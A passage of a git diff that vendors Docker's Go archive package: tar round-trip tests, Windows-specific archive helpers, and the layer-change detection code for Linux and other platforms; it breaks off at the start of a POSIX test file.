+ {0000, 0000}, + {0777, 0777}, + {0644, 0644}, + {0755, 0755}, + {0444, 0444}, + } + for _, v := range cases { + if out := chmodTarEntry(v.in); out != v.expected { + t.Fatalf("wrong chmod. expected:%v got:%v", v.expected, out) + } + } +} + +func TestTarWithHardLink(t *testing.T) { + origin, err := ioutil.TempDir("", "docker-test-tar-hardlink") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(origin) + if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { + t.Fatal(err) + } + if err := os.Link(filepath.Join(origin, "1"), filepath.Join(origin, "2")); err != nil { + t.Fatal(err) + } + + var i1, i2 uint64 + if i1, err = getNlink(filepath.Join(origin, "1")); err != nil { + t.Fatal(err) + } + // sanity check that we can hardlink + if i1 != 2 { + t.Skipf("skipping since hardlinks don't work here; expected 2 links, got %d", i1) + } + + dest, err := ioutil.TempDir("", "docker-test-tar-hardlink-dest") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dest) + + // we'll do this in two steps to separate failure + fh, err := Tar(origin, Uncompressed) + if err != nil { + t.Fatal(err) + } + + // ensure we can read the whole thing with no error, before writing back out + buf, err := ioutil.ReadAll(fh) + if err != nil { + t.Fatal(err) + } + + bRdr := bytes.NewReader(buf) + err = Untar(bRdr, dest, &TarOptions{Compression: Uncompressed}) + if err != nil { + t.Fatal(err) + } + + if i1, err = getInode(filepath.Join(dest, "1")); err != nil { + t.Fatal(err) + } + if i2, err = getInode(filepath.Join(dest, "2")); err != nil { + t.Fatal(err) + } + + if i1 != i2 { + t.Errorf("expected matching inodes, but got %d and %d", i1, i2) + } +} + +func getNlink(path string) (uint64, error) { + stat, err := os.Stat(path) + if err != nil { + return 0, err + } + statT, ok := stat.Sys().(*syscall.Stat_t) + if !ok { + return 0, fmt.Errorf("expected type *syscall.Stat_t, got %t", stat.Sys()) + } + // We need this conversion on ARM64 + return uint64(statT.Nlink), nil +} + +func getInode(path string) (uint64, error) { + stat, err := os.Stat(path) + if err != nil { + return 0, err + } + statT, ok := stat.Sys().(*syscall.Stat_t) + if !ok { + return 0, fmt.Errorf("expected type *syscall.Stat_t, got %t", stat.Sys()) + } + return statT.Ino, nil +} + +func TestTarWithBlockCharFifo(t *testing.T) { + origin, err := ioutil.TempDir("", "docker-test-tar-hardlink") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(origin) + if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { + t.Fatal(err) + } + if err := system.Mknod(filepath.Join(origin, "2"), syscall.S_IFBLK, int(system.Mkdev(int64(12), int64(5)))); err != nil { + t.Fatal(err) + } + if err := system.Mknod(filepath.Join(origin, "3"), syscall.S_IFCHR, int(system.Mkdev(int64(12), int64(5)))); err != nil { + t.Fatal(err) + } + if err := system.Mknod(filepath.Join(origin, "4"), syscall.S_IFIFO, int(system.Mkdev(int64(12), int64(5)))); err != nil { + t.Fatal(err) + } + + dest, err := ioutil.TempDir("", "docker-test-tar-hardlink-dest") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dest) + + // we'll do this in two steps to separate failure + fh, err := Tar(origin, Uncompressed) + if err != nil { + t.Fatal(err) + } + + // ensure we can read the whole thing with no error, before writing back out + buf, err := ioutil.ReadAll(fh) + if err != nil { + t.Fatal(err) + } + + bRdr := bytes.NewReader(buf) + err = Untar(bRdr, dest, &TarOptions{Compression: Uncompressed}) + if err != nil { + t.Fatal(err) + } + + changes, err := ChangesDirs(origin, dest) + if err != nil { + t.Fatal(err) + } + if len(changes) > 0 { + t.Fatalf("Tar with special device (block, char, fifo) should keep them (recreate them when untar) : %v", changes) + } +} + +// TestTarUntarWithXattr is Unix as Lsetxattr is not supported on Windows +func TestTarUntarWithXattr(t *testing.T) { + if runtime.GOOS == "solaris" { + t.Skip() + } + origin, err := ioutil.TempDir("", "docker-test-untar-origin") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(origin) + if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(origin, "3"), []byte("will be ignored"), 0700); err != nil { + t.Fatal(err) + } + if err := system.Lsetxattr(filepath.Join(origin, "2"), "security.capability", []byte{0x00}, 0); err != nil { + t.Fatal(err) + } + + for _, c := range []Compression{ + Uncompressed, + Gzip, + } { + changes, err := tarUntar(t, origin, &TarOptions{ + Compression: c, + ExcludePatterns: []string{"3"}, + }) + + if err != nil { + t.Fatalf("Error tar/untar for compression %s: %s", c.Extension(), err) + } + + if len(changes) != 1 || changes[0].Path != "/3" { + t.Fatalf("Unexpected differences after tarUntar: %v", changes) + } + capability, _ := system.Lgetxattr(filepath.Join(origin, "2"), "security.capability") + if capability == nil && capability[0] != 0x00 { + t.Fatalf("Untar should have kept the 'security.capability' xattr.") + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_windows.go b/vendor/github.com/docker/docker/pkg/archive/archive_windows.go new file mode 100644 index 0000000000..5c3a1be340 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_windows.go @@ -0,0 +1,70 @@ +// +build windows + +package archive + +import ( + "archive/tar" + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/longpath" +) + +// fixVolumePathPrefix does platform specific processing to ensure that if +// the path being passed in is not in a volume path format, convert it to one. +func fixVolumePathPrefix(srcPath string) string { + return longpath.AddPrefix(srcPath) +} + +// getWalkRoot calculates the root path when performing a TarWithOptions. +// We use a separate function as this is platform specific. +func getWalkRoot(srcPath string, include string) string { + return filepath.Join(srcPath, include) +} + +// CanonicalTarNameForPath returns platform-specific filepath +// to canonical posix-style path for tar archival. p is relative +// path. +func CanonicalTarNameForPath(p string) (string, error) { + // windows: convert windows style relative path with backslashes + // into forward slashes. Since windows does not allow '/' or '\' + // in file names, it is mostly safe to replace however we must + // check just in case + if strings.Contains(p, "/") { + return "", fmt.Errorf("Windows path contains forward slash: %s", p) + } + return strings.Replace(p, string(os.PathSeparator), "/", -1), nil + +} + +// chmodTarEntry is used to adjust the file permissions used in tar header based +// on the platform the archival is done. +func chmodTarEntry(perm os.FileMode) os.FileMode { + perm &= 0755 + // Add the x bit: make everything +x from windows + perm |= 0111 + + return perm +} + +func setHeaderForSpecialDevice(hdr *tar.Header, ta *tarAppender, name string, stat interface{}) (inode uint64, err error) { + // do nothing. no notion of Rdev, Inode, Nlink in stat on Windows + return +} + +// handleTarTypeBlockCharFifo is an OS-specific helper function used by +// createTarFile to handle the following types of header: Block; Char; Fifo +func handleTarTypeBlockCharFifo(hdr *tar.Header, path string) error { + return nil +} + +func handleLChmod(hdr *tar.Header, path string, hdrInfo os.FileInfo) error { + return nil +} + +func getFileUIDGID(stat interface{}) (int, int, error) { + // no notion of file ownership mapping yet on Windows + return 0, 0, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go new file mode 100644 index 0000000000..0c6733d6bd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go @@ -0,0 +1,91 @@ +// +build windows + +package archive + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func TestCopyFileWithInvalidDest(t *testing.T) { + // TODO Windows: This is currently failing. Not sure what has + // recently changed in CopyWithTar as used to pass. Further investigation + // is required. + t.Skip("Currently fails") + folder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(folder) + dest := "c:dest" + srcFolder := filepath.Join(folder, "src") + src := filepath.Join(folder, "src", "src") + err = os.MkdirAll(srcFolder, 0740) + if err != nil { + t.Fatal(err) + } + ioutil.WriteFile(src, []byte("content"), 0777) + err = CopyWithTar(src, dest) + if err == nil { + t.Fatalf("archiver.CopyWithTar should throw an error on invalid dest.") + } +} + +func TestCanonicalTarNameForPath(t *testing.T) { + cases := []struct { + in, expected string + shouldFail bool + }{ + {"foo", "foo", false}, + {"foo/bar", "___", true}, // unix-styled windows path must fail + {`foo\bar`, "foo/bar", false}, + } + for _, v := range cases { + if out, err := CanonicalTarNameForPath(v.in); err != nil && !v.shouldFail { + t.Fatalf("cannot get canonical name for path: %s: %v", v.in, err) + } else if v.shouldFail && err == nil { + t.Fatalf("canonical path call should have failed with error. in=%s out=%s", v.in, out) + } else if !v.shouldFail && out != v.expected { + t.Fatalf("wrong canonical tar name. expected:%s got:%s", v.expected, out) + } + } +} + +func TestCanonicalTarName(t *testing.T) { + cases := []struct { + in string + isDir bool + expected string + }{ + {"foo", false, "foo"}, + {"foo", true, "foo/"}, + {`foo\bar`, false, "foo/bar"}, + {`foo\bar`, true, "foo/bar/"}, + } + for _, v := range cases { + if out, err := canonicalTarName(v.in, v.isDir); err != nil { + t.Fatalf("cannot get canonical name for path: %s: %v", v.in, err) + } else if out != v.expected { + t.Fatalf("wrong canonical tar name. expected:%s got:%s", v.expected, out) + } + } +} + +func TestChmodTarEntry(t *testing.T) { + cases := []struct { + in, expected os.FileMode + }{ + {0000, 0111}, + {0777, 0755}, + {0644, 0755}, + {0755, 0755}, + {0444, 0555}, + } + for _, v := range cases { + if out := chmodTarEntry(v.in); out != v.expected { + t.Fatalf("wrong chmod. expected:%v got:%v", v.expected, out) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes.go b/vendor/github.com/docker/docker/pkg/archive/changes.go new file mode 100644 index 0000000000..c07d55cbd9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes.go @@ -0,0 +1,446 @@ +package archive + +import ( + "archive/tar" + "bytes" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "sort" + "strings" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/system" +) + +// ChangeType represents the change type. +type ChangeType int + +const ( + // ChangeModify represents the modify operation. + ChangeModify = iota + // ChangeAdd represents the add operation. + ChangeAdd + // ChangeDelete represents the delete operation. + ChangeDelete +) + +func (c ChangeType) String() string { + switch c { + case ChangeModify: + return "C" + case ChangeAdd: + return "A" + case ChangeDelete: + return "D" + } + return "" +} + +// Change represents a change, it wraps the change type and path. +// It describes changes of the files in the path respect to the +// parent layers. The change could be modify, add, delete. +// This is used for layer diff. +type Change struct { + Path string + Kind ChangeType +} + +func (change *Change) String() string { + return fmt.Sprintf("%s %s", change.Kind, change.Path) +} + +// for sort.Sort +type changesByPath []Change + +func (c changesByPath) Less(i, j int) bool { return c[i].Path < c[j].Path } +func (c changesByPath) Len() int { return len(c) } +func (c changesByPath) Swap(i, j int) { c[j], c[i] = c[i], c[j] } + +// Gnu tar and the go tar writer don't have sub-second mtime +// precision, which is problematic when we apply changes via tar +// files, we handle this by comparing for exact times, *or* same +// second count and either a or b having exactly 0 nanoseconds +func sameFsTime(a, b time.Time) bool { + return a == b || + (a.Unix() == b.Unix() && + (a.Nanosecond() == 0 || b.Nanosecond() == 0)) +} + +func sameFsTimeSpec(a, b syscall.Timespec) bool { + return a.Sec == b.Sec && + (a.Nsec == b.Nsec || a.Nsec == 0 || b.Nsec == 0) +} + +// Changes walks the path rw and determines changes for the files in the path, +// with respect to the parent layers +func Changes(layers []string, rw string) ([]Change, error) { + return changes(layers, rw, aufsDeletedFile, aufsMetadataSkip) +} + +func aufsMetadataSkip(path string) (skip bool, err error) { + skip, err = filepath.Match(string(os.PathSeparator)+WhiteoutMetaPrefix+"*", path) + if err != nil { + skip = true + } + return +} + +func aufsDeletedFile(root, path string, fi os.FileInfo) (string, error) { + f := filepath.Base(path) + + // If there is a whiteout, then the file was removed + if strings.HasPrefix(f, WhiteoutPrefix) { + originalFile := f[len(WhiteoutPrefix):] + return filepath.Join(filepath.Dir(path), originalFile), nil + } + + return "", nil +} + +type skipChange func(string) (bool, error) +type deleteChange func(string, string, os.FileInfo) (string, error) + +func changes(layers []string, rw string, dc deleteChange, sc skipChange) ([]Change, error) { + var ( + changes []Change + changedDirs = make(map[string]struct{}) + ) + + err := filepath.Walk(rw, func(path string, f os.FileInfo, err error) error { + if err != nil { + return err + } + + // Rebase path + path, err = filepath.Rel(rw, path) + if err != nil { + return err + } + + // As this runs on the daemon side, file paths are OS specific. + path = filepath.Join(string(os.PathSeparator), path) + + // Skip root + if path == string(os.PathSeparator) { + return nil + } + + if sc != nil { + if skip, err := sc(path); skip { + return err + } + } + + change := Change{ + Path: path, + } + + deletedFile, err := dc(rw, path, f) + if err != nil { + return err + } + + // Find out what kind of modification happened + if deletedFile != "" { + change.Path = deletedFile + change.Kind = ChangeDelete + } else { + // Otherwise, the file was added + change.Kind = ChangeAdd + + // ...Unless it already existed in a top layer, in which case, it's a modification + for _, layer := range layers { + stat, err := os.Stat(filepath.Join(layer, path)) + if err != nil && !os.IsNotExist(err) { + return err + } + if err == nil { + // The file existed in the top layer, so that's a modification + + // However, if it's a directory, maybe it wasn't actually modified. + // If you modify /foo/bar/baz, then /foo will be part of the changed files only because it's the parent of bar + if stat.IsDir() && f.IsDir() { + if f.Size() == stat.Size() && f.Mode() == stat.Mode() && sameFsTime(f.ModTime(), stat.ModTime()) { + // Both directories are the same, don't record the change + return nil + } + } + change.Kind = ChangeModify + break + } + } + } + + // If /foo/bar/file.txt is modified, then /foo/bar must be part of the changed files. + // This block is here to ensure the change is recorded even if the + // modify time, mode and size of the parent directory in the rw and ro layers are all equal. + // Check https://github.com/docker/docker/pull/13590 for details. + if f.IsDir() { + changedDirs[path] = struct{}{} + } + if change.Kind == ChangeAdd || change.Kind == ChangeDelete { + parent := filepath.Dir(path) + if _, ok := changedDirs[parent]; !ok && parent != "/" { + changes = append(changes, Change{Path: parent, Kind: ChangeModify}) + changedDirs[parent] = struct{}{} + } + } + + // Record change + changes = append(changes, change) + return nil + }) + if err != nil && !os.IsNotExist(err) { + return nil, err + } + return changes, nil +} + +// FileInfo describes the information of a file. +type FileInfo struct { + parent *FileInfo + name string + stat *system.StatT + children map[string]*FileInfo + capability []byte + added bool +} + +// LookUp looks up the file information of a file. +func (info *FileInfo) LookUp(path string) *FileInfo { + // As this runs on the daemon side, file paths are OS specific. + parent := info + if path == string(os.PathSeparator) { + return info + } + + pathElements := strings.Split(path, string(os.PathSeparator)) + for _, elem := range pathElements { + if elem != "" { + child := parent.children[elem] + if child == nil { + return nil + } + parent = child + } + } + return parent +} + +func (info *FileInfo) path() string { + if info.parent == nil { + // As this runs on the daemon side, file paths are OS specific. + return string(os.PathSeparator) + } + return filepath.Join(info.parent.path(), info.name) +} + +func (info *FileInfo) addChanges(oldInfo *FileInfo, changes *[]Change) { + + sizeAtEntry := len(*changes) + + if oldInfo == nil { + // add + change := Change{ + Path: info.path(), + Kind: ChangeAdd, + } + *changes = append(*changes, change) + info.added = true + } + + // We make a copy so we can modify it to detect additions + // also, we only recurse on the old dir if the new info is a directory + // otherwise any previous delete/change is considered recursive + oldChildren := make(map[string]*FileInfo) + if oldInfo != nil && info.isDir() { + for k, v := range oldInfo.children { + oldChildren[k] = v + } + } + + for name, newChild := range info.children { + oldChild, _ := oldChildren[name] + if oldChild != nil { + // change? + oldStat := oldChild.stat + newStat := newChild.stat + // Note: We can't compare inode or ctime or blocksize here, because these change + // when copying a file into a container. However, that is not generally a problem + // because any content change will change mtime, and any status change should + // be visible when actually comparing the stat fields. The only time this + // breaks down is if some code intentionally hides a change by setting + // back mtime + if statDifferent(oldStat, newStat) || + bytes.Compare(oldChild.capability, newChild.capability) != 0 { + change := Change{ + Path: newChild.path(), + Kind: ChangeModify, + } + *changes = append(*changes, change) + newChild.added = true + } + + // Remove from copy so we can detect deletions + delete(oldChildren, name) + } + + newChild.addChanges(oldChild, changes) + } + for _, oldChild := range oldChildren { + // delete + change := Change{ + Path: oldChild.path(), + Kind: ChangeDelete, + } + *changes = append(*changes, change) + } + + // If there were changes inside this directory, we need to add it, even if the directory + // itself wasn't changed. This is needed to properly save and restore filesystem permissions. + // As this runs on the daemon side, file paths are OS specific. + if len(*changes) > sizeAtEntry && info.isDir() && !info.added && info.path() != string(os.PathSeparator) { + change := Change{ + Path: info.path(), + Kind: ChangeModify, + } + // Let's insert the directory entry before the recently added entries located inside this dir + *changes = append(*changes, change) // just to resize the slice, will be overwritten + copy((*changes)[sizeAtEntry+1:], (*changes)[sizeAtEntry:]) + (*changes)[sizeAtEntry] = change + } + +} + +// Changes add changes to file information. +func (info *FileInfo) Changes(oldInfo *FileInfo) []Change { + var changes []Change + + info.addChanges(oldInfo, &changes) + + return changes +} + +func newRootFileInfo() *FileInfo { + // As this runs on the daemon side, file paths are OS specific. + root := &FileInfo{ + name: string(os.PathSeparator), + children: make(map[string]*FileInfo), + } + return root +} + +// ChangesDirs compares two directories and generates an array of Change objects describing the changes. +// If oldDir is "", then all files in newDir will be Add-Changes. +func ChangesDirs(newDir, oldDir string) ([]Change, error) { + var ( + oldRoot, newRoot *FileInfo + ) + if oldDir == "" { + emptyDir, err := ioutil.TempDir("", "empty") + if err != nil { + return nil, err + } + defer os.Remove(emptyDir) + oldDir = emptyDir + } + oldRoot, newRoot, err := collectFileInfoForChanges(oldDir, newDir) + if err != nil { + return nil, err + } + + return newRoot.Changes(oldRoot), nil +} + +// ChangesSize calculates the size in bytes of the provided changes, based on newDir. +func ChangesSize(newDir string, changes []Change) int64 { + var ( + size int64 + sf = make(map[uint64]struct{}) + ) + for _, change := range changes { + if change.Kind == ChangeModify || change.Kind == ChangeAdd { + file := filepath.Join(newDir, change.Path) + fileInfo, err := os.Lstat(file) + if err != nil { + logrus.Errorf("Can not stat %q: %s", file, err) + continue + } + + if fileInfo != nil && !fileInfo.IsDir() { + if hasHardlinks(fileInfo) { + inode := getIno(fileInfo) + if _, ok := sf[inode]; !ok { + size += fileInfo.Size() + sf[inode] = struct{}{} + } + } else { + size += fileInfo.Size() + } + } + } + } + return size +} + +// ExportChanges produces an Archive from the provided changes, relative to dir. +func ExportChanges(dir string, changes []Change, uidMaps, gidMaps []idtools.IDMap) (io.ReadCloser, error) { + reader, writer := io.Pipe() + go func() { + ta := &tarAppender{ + TarWriter: tar.NewWriter(writer), + Buffer: pools.BufioWriter32KPool.Get(nil), + SeenFiles: make(map[uint64]string), + UIDMaps: uidMaps, + GIDMaps: gidMaps, + } + // this buffer is needed for the duration of this piped stream + defer pools.BufioWriter32KPool.Put(ta.Buffer) + + sort.Sort(changesByPath(changes)) + + // In general we log errors here but ignore them because + // during e.g. a diff operation the container can continue + // mutating the filesystem and we can see transient errors + // from this + for _, change := range changes { + if change.Kind == ChangeDelete { + whiteOutDir := filepath.Dir(change.Path) + whiteOutBase := filepath.Base(change.Path) + whiteOut := filepath.Join(whiteOutDir, WhiteoutPrefix+whiteOutBase) + timestamp := time.Now() + hdr := &tar.Header{ + Name: whiteOut[1:], + Size: 0, + ModTime: timestamp, + AccessTime: timestamp, + ChangeTime: timestamp, + } + if err := ta.TarWriter.WriteHeader(hdr); err != nil { + logrus.Debugf("Can't write whiteout header: %s", err) + } + } else { + path := filepath.Join(dir, change.Path) + if err := ta.addTarFile(path, change.Path[1:]); err != nil { + logrus.Debugf("Can't add file %s to tar: %s", path, err) + } + } + } + + // Make sure to check the error on Close. + if err := ta.TarWriter.Close(); err != nil { + logrus.Debugf("Can't close layer: %s", err) + } + if err := writer.Close(); err != nil { + logrus.Debugf("failed close Changes writer: %s", err) + } + }() + return reader, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_linux.go b/vendor/github.com/docker/docker/pkg/archive/changes_linux.go new file mode 100644 index 0000000000..fc5a9dfdb9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes_linux.go @@ -0,0 +1,312 @@ +package archive + +import ( + "bytes" + "fmt" + "os" + "path/filepath" + "sort" + "syscall" + "unsafe" + + "github.com/docker/docker/pkg/system" +) + +// walker is used to implement collectFileInfoForChanges on linux. Where this +// method in general returns the entire contents of two directory trees, we +// optimize some FS calls out on linux. In particular, we take advantage of the +// fact that getdents(2) returns the inode of each file in the directory being +// walked, which, when walking two trees in parallel to generate a list of +// changes, can be used to prune subtrees without ever having to lstat(2) them +// directly. Eliminating stat calls in this way can save up to seconds on large +// images. +type walker struct { + dir1 string + dir2 string + root1 *FileInfo + root2 *FileInfo +} + +// collectFileInfoForChanges returns a complete representation of the trees +// rooted at dir1 and dir2, with one important exception: any subtree or +// leaf where the inode and device numbers are an exact match between dir1 +// and dir2 will be pruned from the results. This method is *only* to be used +// to generating a list of changes between the two directories, as it does not +// reflect the full contents. +func collectFileInfoForChanges(dir1, dir2 string) (*FileInfo, *FileInfo, error) { + w := &walker{ + dir1: dir1, + dir2: dir2, + root1: newRootFileInfo(), + root2: newRootFileInfo(), + } + + i1, err := os.Lstat(w.dir1) + if err != nil { + return nil, nil, err + } + i2, err := os.Lstat(w.dir2) + if err != nil { + return nil, nil, err + } + + if err := w.walk("/", i1, i2); err != nil { + return nil, nil, err + } + + return w.root1, w.root2, nil +} + +// Given a FileInfo, its path info, and a reference to the root of the tree +// being constructed, register this file with the tree. +func walkchunk(path string, fi os.FileInfo, dir string, root *FileInfo) error { + if fi == nil { + return nil + } + parent := root.LookUp(filepath.Dir(path)) + if parent == nil { + return fmt.Errorf("collectFileInfoForChanges: Unexpectedly no parent for %s", path) + } + info := &FileInfo{ + name: filepath.Base(path), + children: make(map[string]*FileInfo), + parent: parent, + } + cpath := filepath.Join(dir, path) + stat, err := system.FromStatT(fi.Sys().(*syscall.Stat_t)) + if err != nil { + return err + } + info.stat = stat + info.capability, _ = system.Lgetxattr(cpath, "security.capability") // lgetxattr(2): fs access + parent.children[info.name] = info + return nil +} + +// Walk a subtree rooted at the same path in both trees being iterated. For +// example, /docker/overlay/1234/a/b/c/d and /docker/overlay/8888/a/b/c/d +func (w *walker) walk(path string, i1, i2 os.FileInfo) (err error) { + // Register these nodes with the return trees, unless we're still at the + // (already-created) roots: + if path != "/" { + if err := walkchunk(path, i1, w.dir1, w.root1); err != nil { + return err + } + if err := walkchunk(path, i2, w.dir2, w.root2); err != nil { + return err + } + } + + is1Dir := i1 != nil && i1.IsDir() + is2Dir := i2 != nil && i2.IsDir() + + sameDevice := false + if i1 != nil && i2 != nil { + si1 := i1.Sys().(*syscall.Stat_t) + si2 := i2.Sys().(*syscall.Stat_t) + if si1.Dev == si2.Dev { + sameDevice = true + } + } + + // If these files are both non-existent, or leaves (non-dirs), we are done. + if !is1Dir && !is2Dir { + return nil + } + + // Fetch the names of all the files contained in both directories being walked: + var names1, names2 []nameIno + if is1Dir { + names1, err = readdirnames(filepath.Join(w.dir1, path)) // getdents(2): fs access + if err != nil { + return err + } + } + if is2Dir { + names2, err = readdirnames(filepath.Join(w.dir2, path)) // getdents(2): fs access + if err != nil { + return err + } + } + + // We have lists of the files contained in both parallel directories, sorted + // in the same order. Walk them in parallel, generating a unique merged list + // of all items present in either or both directories. + var names []string + ix1 := 0 + ix2 := 0 + + for { + if ix1 >= len(names1) { + break + } + if ix2 >= len(names2) { + break + } + + ni1 := names1[ix1] + ni2 := names2[ix2] + + switch bytes.Compare([]byte(ni1.name), []byte(ni2.name)) { + case -1: // ni1 < ni2 -- advance ni1 + // we will not encounter ni1 in names2 + names = append(names, ni1.name) + ix1++ + case 0: // ni1 == ni2 + if ni1.ino != ni2.ino || !sameDevice { + names = append(names, ni1.name) + } + ix1++ + ix2++ + case 1: // ni1 > ni2 -- advance ni2 + // we will not encounter ni2 in names1 + names = append(names, ni2.name) + ix2++ + } + } + for ix1 < len(names1) { + names = append(names, names1[ix1].name) + ix1++ + } + for ix2 < len(names2) { + names = append(names, names2[ix2].name) + ix2++ + } + + // For each of the names present in either or both of the directories being + // iterated, stat the name under each root, and recurse the pair of them: + for _, name := range names { + fname := filepath.Join(path, name) + var cInfo1, cInfo2 os.FileInfo + if is1Dir { + cInfo1, err = os.Lstat(filepath.Join(w.dir1, fname)) // lstat(2): fs access + if err != nil && !os.IsNotExist(err) { + return err + } + } + if is2Dir { + cInfo2, err = os.Lstat(filepath.Join(w.dir2, fname)) // lstat(2): fs access + if err != nil && !os.IsNotExist(err) { + return err + } + } + if err = w.walk(fname, cInfo1, cInfo2); err != nil { + return err + } + } + return nil +} + +// {name,inode} pairs used to support the early-pruning logic of the walker type +type nameIno struct { + name string + ino uint64 +} + +type nameInoSlice []nameIno + +func (s nameInoSlice) Len() int { return len(s) } +func (s nameInoSlice) Swap(i, j int) { s[i], s[j] = s[j], s[i] } +func (s nameInoSlice) Less(i, j int) bool { return s[i].name < s[j].name } + +// readdirnames is a hacked-apart version of the Go stdlib code, exposing inode +// numbers further up the stack when reading directory contents. Unlike +// os.Readdirnames, which returns a list of filenames, this function returns a +// list of {filename,inode} pairs. +func readdirnames(dirname string) (names []nameIno, err error) { + var ( + size = 100 + buf = make([]byte, 4096) + nbuf int + bufp int + nb int + ) + + f, err := os.Open(dirname) + if err != nil { + return nil, err + } + defer f.Close() + + names = make([]nameIno, 0, size) // Empty with room to grow. + for { + // Refill the buffer if necessary + if bufp >= nbuf { + bufp = 0 + nbuf, err = syscall.ReadDirent(int(f.Fd()), buf) // getdents on linux + if nbuf < 0 { + nbuf = 0 + } + if err != nil { + return nil, os.NewSyscallError("readdirent", err) + } + if nbuf <= 0 { + break // EOF + } + } + + // Drain the buffer + nb, names = parseDirent(buf[bufp:nbuf], names) + bufp += nb + } + + sl := nameInoSlice(names) + sort.Sort(sl) + return sl, nil +} + +// parseDirent is a minor modification of syscall.ParseDirent (linux version) +// which returns {name,inode} pairs instead of just names. +func parseDirent(buf []byte, names []nameIno) (consumed int, newnames []nameIno) { + origlen := len(buf) + for len(buf) > 0 { + dirent := (*syscall.Dirent)(unsafe.Pointer(&buf[0])) + buf = buf[dirent.Reclen:] + if dirent.Ino == 0 { // File absent in directory. + continue + } + bytes := (*[10000]byte)(unsafe.Pointer(&dirent.Name[0])) + var name = string(bytes[0:clen(bytes[:])]) + if name == "." || name == ".." { // Useless names + continue + } + names = append(names, nameIno{name, dirent.Ino}) + } + return origlen - len(buf), names +} + +func clen(n []byte) int { + for i := 0; i < len(n); i++ { + if n[i] == 0 { + return i + } + } + return len(n) +} + +// OverlayChanges walks the path rw and determines changes for the files in the path, +// with respect to the parent layers +func OverlayChanges(layers []string, rw string) ([]Change, error) { + return changes(layers, rw, overlayDeletedFile, nil) +} + +func overlayDeletedFile(root, path string, fi os.FileInfo) (string, error) { + if fi.Mode()&os.ModeCharDevice != 0 { + s := fi.Sys().(*syscall.Stat_t) + if major(uint64(s.Rdev)) == 0 && minor(uint64(s.Rdev)) == 0 { + return path, nil + } + } + if fi.Mode()&os.ModeDir != 0 { + opaque, err := system.Lgetxattr(filepath.Join(root, path), "trusted.overlay.opaque") + if err != nil { + return "", err + } + if len(opaque) == 1 && opaque[0] == 'y' { + return path, nil + } + } + + return "", nil + +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_other.go b/vendor/github.com/docker/docker/pkg/archive/changes_other.go new file mode 100644 index 0000000000..da70ed37c4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes_other.go @@ -0,0 +1,97 @@ +// +build !linux + +package archive + +import ( + "fmt" + "os" + "path/filepath" + "runtime" + "strings" + + "github.com/docker/docker/pkg/system" +) + +func collectFileInfoForChanges(oldDir, newDir string) (*FileInfo, *FileInfo, error) { + var ( + oldRoot, newRoot *FileInfo + err1, err2 error + errs = make(chan error, 2) + ) + go func() { + oldRoot, err1 = collectFileInfo(oldDir) + errs <- err1 + }() + go func() { + newRoot, err2 = collectFileInfo(newDir) + errs <- err2 + }() + + // block until both routines have returned + for i := 0; i < 2; i++ { + if err := <-errs; err != nil { + return nil, nil, err + } + } + + return oldRoot, newRoot, nil +} + +func collectFileInfo(sourceDir string) (*FileInfo, error) { + root := newRootFileInfo() + + err := filepath.Walk(sourceDir, func(path string, f os.FileInfo, err error) error { + if err != nil { + return err + } + + // Rebase path + relPath, err := filepath.Rel(sourceDir, path) + if err != nil { + return err + } + + // As this runs on the daemon side, file paths are OS specific. + relPath = filepath.Join(string(os.PathSeparator), relPath) + + // See https://github.com/golang/go/issues/9168 - bug in filepath.Join. + // Temporary workaround. If the returned path starts with two backslashes, + // trim it down to a single backslash. Only relevant on Windows. + if runtime.GOOS == "windows" { + if strings.HasPrefix(relPath, `\\`) { + relPath = relPath[1:] + } + } + + if relPath == string(os.PathSeparator) { + return nil + } + + parent := root.LookUp(filepath.Dir(relPath)) + if parent == nil { + return fmt.Errorf("collectFileInfo: Unexpectedly no parent for %s", relPath) + } + + info := &FileInfo{ + name: filepath.Base(relPath), + children: make(map[string]*FileInfo), + parent: parent, + } + + s, err := system.Lstat(path) + if err != nil { + return err + } + info.stat = s + + info.capability, _ = system.Lgetxattr(path, "security.capability") + + parent.children[info.name] = info + + return nil + }) + if err != nil { + return nil, err + } + return root, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go b/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go new file mode 100644 index 0000000000..095102e578 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go @@ -0,0 +1,132 @@ +package archive + +import ( + "archive/tar" + "fmt" + "io" + "io/ioutil" + "os" + "path" + "runtime" + "sort" + "testing" +) + +func TestHardLinkOrder(t *testing.T) { + //TODO Should run for Solaris + if runtime.GOOS == "solaris" { + t.Skip("gcp failures on Solaris") + } + names := []string{"file1.txt", "file2.txt", "file3.txt"} + msg := []byte("Hey y'all") + + // Create dir + src, err := 